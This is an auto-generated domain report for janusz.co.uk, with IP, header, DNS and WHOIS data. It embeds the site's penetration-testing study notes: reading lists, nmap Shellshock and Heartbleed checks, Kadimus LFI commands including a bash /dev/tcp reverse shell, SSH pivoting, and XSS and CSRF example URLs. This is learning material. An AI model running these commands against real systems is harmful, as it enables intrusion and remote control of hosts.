Server:Apache...
The main IP address: 185.119.173.124,Your server -,- ISP:- TLD:uk CountryCode:-
The description :books/resources scripts tools eli5 books/resources web application hackers handbook a great (free) linux command line / bash scripting refresher: http://linuxcommand.org/tlcl.php some windows cmd stuf...
This report updates in 25-Jul-2019
Created Date: | 2003-12-07 |
Changed Date: | 2017-12-07 |
Geo IP provides you such as latitude, longitude and ISP (Internet Service Provider) etc. informations. Our GeoIP service found where is host janusz.co.uk. Currently, hosted in - and its service provider is - .
Latitude: | 0 |
Longitude: | 0 |
Country: | - (-) |
City: | - |
Region: | - |
ISP: | - |
HTTP Header information is a part of HTTP protocol that a user's browser sends to called Apache containing the details of what the browser wants and will accept back from the web server.
X-Cache: | MISS from lin-10-170-0-222.gridhost.co.uk |
Transfer-Encoding: | chunked |
Set-Cookie: | DYNSRV=lin-10-170-0-222; path=/ |
X-Cache-Lookup: | HIT from lin-10-170-0-222.gridhost.co.uk:3128 |
Server: | Apache |
Connection: | close |
Date: | Thu, 25 Jul 2019 05:27:00 GMT |
Content-Type: | text/html; charset=UTF-8 |
soa: | ns1.vhdns.net. support.registron.co.uk. 1512075533 10800 3600 604800 3600 |
ns: | ns1.vhdns.net. ns2.vhdns.net. |
ipv4: | IP:185.119.173.124 ASN:198047 OWNER:UKWEB-EQX, GB Country:GB |
mx: | MX preference = 0, mail exchanger = mail.vhdns.net. |
books/resources scripts tools eli5 books/resources web application hackers handbook a great (free) linux command line / bash scripting refresher: http://linuxcommand.org/tlcl.php some windows cmd stuff, but i would try to find something better: https://technet.microsoft.com/en-gb/library/bb490890.aspx rtfm - a useful command line cheat sheet for linux and windows, despite some errors: https://www.amazon.co.uk/rtfm-red-team-field-manual/dp/1494295504 introduction to network/infrastructure testing, often used for initial crest theory exam revision, there are two editions worth looking at 2nd and 3rd edition: https://www.amazon.co.uk/network-security-assessment-know-your/dp/0596510306 windows & linux privilege escalation fundamentals: http://www.fuzzysecurity.com/tutorials/16.html and https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ this one is for windows and linux, comes with free vms: https://github.com/sagishahar/lpeworkshop good pentest book series: https://www.amazon.com/hacker-playbook-practical-penetration-testing/dp/1494932636 and https://www.amazon.com/hacker-playbook-practical-penetration-testing/dp/1512214566/ hacking exposed series: https://www.amazon.co.uk/s/ref=nb_sb_ss_i_2_7?url=search-alias%3dstripbooks&field-keywords;=hacking+exposed&sprefix;=hacking%2cstripbooks%2c162 all you would like to know about how nmap works: https://nmap.org/book/man.html online hacking challenges, worth trying out, some of these are similar to oscp (see below) quality: https://www.hackthebox.eu/ and https://www.hackthissite.org/ some interesting subjects to explore if time allows: http://opensecuritytraining.info/training.html scripts shellshock x='() { :;}; echo vulnerable' bash -c : shocker.py -h hostname -e command_to_execute -c cgi_file_to_check - ncc group nmap -sv -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls - nmap heartbleed travis lee nmap -p 443 --script ssl-heartbleed - nmap tools / utilities sqlmap nmap service discovery: nmap -t4 -a -v -p0-65535 xxx.xxx.xxx.xxx mimikatz - windows post-exploitation tool offensive security useful link: https://www.offensive-security.com/metasploit-unleashed/mimikatz/ curl curl -v xxx.xxx.xxx.xxx kadimus - lfi scan & exploit tool scanning: ./kadimus -u localhost/?pg=contact -a my_user_agent get source code of file: ./kadimus -t localhost/?pg=contact -g -f "index.php%00" -o local_output.php --inject-at pg execute php: ./kadimus -t localhost/?pg=php://input%00 -c 'pwned' -x input execte command: ./kadimus -t localhost/?pg=/var/log/auth.log -x auth -c 'ls -lah' --ssh-target localhost reverse shell: ./kadimus -t localhost/?pg=contact.php -xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0 ssh log in using key: ssh -i key_name [email protected] forward connections to tcp port 8888 on our client to tcp port 80 on internal.site.com ssh -l 8888:internal.site.com:80 -n user_login pivoting ssh -d 9090 user_login then use proxychains , then edit /etc/proxychains.conf and add socks4 127.0.0.1 9090 todo: use netwars ssh todo: empire eli5 xss: when the user trusts the server too much. the attacker tries to force/trick you into making a request which you did not intend. https://janusz.co.uk/account?variable=a'<script>alert(1)</script> csrf: when the server trusts the user too much. https://janusz.co.uk/changepassword?userid=1&newpassword;=foobar heartbleed: openssl does not check to see whether the sender lied about the length of the enclosed message. if it sends a ridiculously large number — something much larger than the full heartbeat message itself — the receiver will keep reading its memory right past the location where the message is stored, and into the program’s own memory ( xkcd ).
http://www.janusz.co.uk//#tools
http://www.janusz.co.uk//#books
http://www.janusz.co.uk//#eli5
http://www.janusz.co.uk//#scripts
http://www.janusz.co.uk//mimikatz
amazon.co.uk
Whois is a protocol that is access to registering information. You can reach when the website was registered, when it will be expire, what is contact details of the site with the following informations. In a nutshell, it includes these informations;
Domain name:
janusz.co.uk
Registrant:
Janusz Jasinski
Registrant type:
UK Individual
Registrant's address:
The registrant is a non-trading individual who has opted to have their
address omitted from the WHOIS service.
Data validation:
Nominet was able to match the registrant's name and address against a 3rd party data source on 22-Jan-2018
Registrar:
Paragon Internet Group Ltd t/a Tsohost [Tag = UKWEBHOSTING]
URL: http://www.tsohost.co.uk
Relevant dates:
Registered on: 07-Dec-2003
Expiry date: 07-Dec-2018
Last updated: 07-Dec-2017
Registration status:
Registered until expiry date.
Name servers:
ns1.tsodns.com
ns2.tsodns.com
WHOIS lookup made at 05:26:45 05-Feb-2018
--
This WHOIS information is provided for free by Nominet UK the central registry
for .uk domain names. This information and the .uk WHOIS are:
Copyright Nominet UK 1996 - 2018.
You may not access the .uk WHOIS or use any data from it except as permitted
by the terms of use available in full at http://www.nominet.uk/whoisterms,
which includes restrictions on: (A) use of the data for advertising, or its
repackaging, recompilation, redistribution or reuse (B) obscuring, removing
or hiding any or all of this notice and (C) exceeding query rate or volume
limits. The data is provided on an 'as-is' basis and may lag behind the
register. Access may be withdrawn or restricted at any time.
REFERRER http://www.nominet.org.uk
REGISTRAR Nominet UK
SERVERS
SERVER co.uk.whois-servers.net
ARGS janusz.co.uk
PORT 43
TYPE domain
OWNER
ORGANIZATION Janusz Jasinski
TYPE
UK Individual
ADDRESS
The registrant is a non-trading individual who has opted to have their
address omitted from the WHOIS service.
Data validation:
Nominet was able to match the registrant's name and address against a 3rd party data source on 22-Jan-2018
DOMAIN
SPONSOR Paragon Internet Group Ltd t/a Tsohost [Tag = UKWEBHOSTING]
CREATED 2003-12-07
CHANGED 2017-12-07
STATUS
Registered until expiry date.
NSERVER
NS1.TSODNS.COM 188.65.116.165
NS2.TSODNS.COM 195.62.28.26
NAME janusz.co.uk
DISCLAIMER
This WHOIS information is provided for free by Nominet UK the central registry
for .uk domain names. This information and the .uk WHOIS are:
Copyright Nominet UK 1996 - 2018.
You may not access the .uk WHOIS or use any data from it except as permitted
by the terms of use available in full at http://www.nominet.uk/whoisterms,
which includes restrictions on: (A) use of the data for advertising, or its
repackaging, recompilation, redistribution or reuse (B) obscuring, removing
or hiding any or all of this notice and (C) exceeding query rate or volume
limits. The data is provided on an 'as-is' basis and may lag behind the
register. Access may be withdrawn or restricted at any time.
REGISTERED yes
The following list shows you to spelling mistakes possible of the internet users for the website searched .